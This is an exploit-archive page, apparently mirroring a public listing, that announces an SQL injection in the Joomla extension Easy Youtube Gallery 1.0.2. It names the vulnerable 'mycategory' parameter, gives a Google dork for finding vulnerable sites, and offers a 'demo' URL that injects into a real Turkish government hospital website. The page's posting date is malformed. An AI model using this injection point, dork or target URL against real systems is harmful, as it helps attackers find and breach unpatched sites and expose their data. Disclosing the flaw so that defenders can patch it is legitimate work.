Home / exploitsPDF  

Joomla Easy Youtube Gallery 1.0.2 SQL Injection

Posted on 30 November -0001

<HTML><HEAD><TITLE>Joomla Easy Youtube Gallery 1.0.2 SQL Injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability # Exploit Author : Persian Hack Team # Vendor Homepage : http://extensions.joomla.org/extension/easy-youtube-gallery # Google Dork : inurl:com_easy_youtube_gallery mycategory # Date: 2016/03/22 # Version: 1.0.2 ###################### # PoC: # mycategory=[SQL] # # Demo: # http://www.onkoloji.gov.tr/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0%27&defaultvideo=9&Itemid=752 # ###################### # Discovered by : # Mojtaba MobhaM (<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="acc7cdd6c9c1c5c1c3c6d8cdcecdecc0c5dac982cfc3c1">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>) # T3NZOG4N (<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="6511560b1f5502510b251c040d0a0a4b060a08">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>) # Homepage : persian-team.ir # Greetz : Milad_Hacking & FireKernel And You ###################### </BODY></HTML>

 

TOP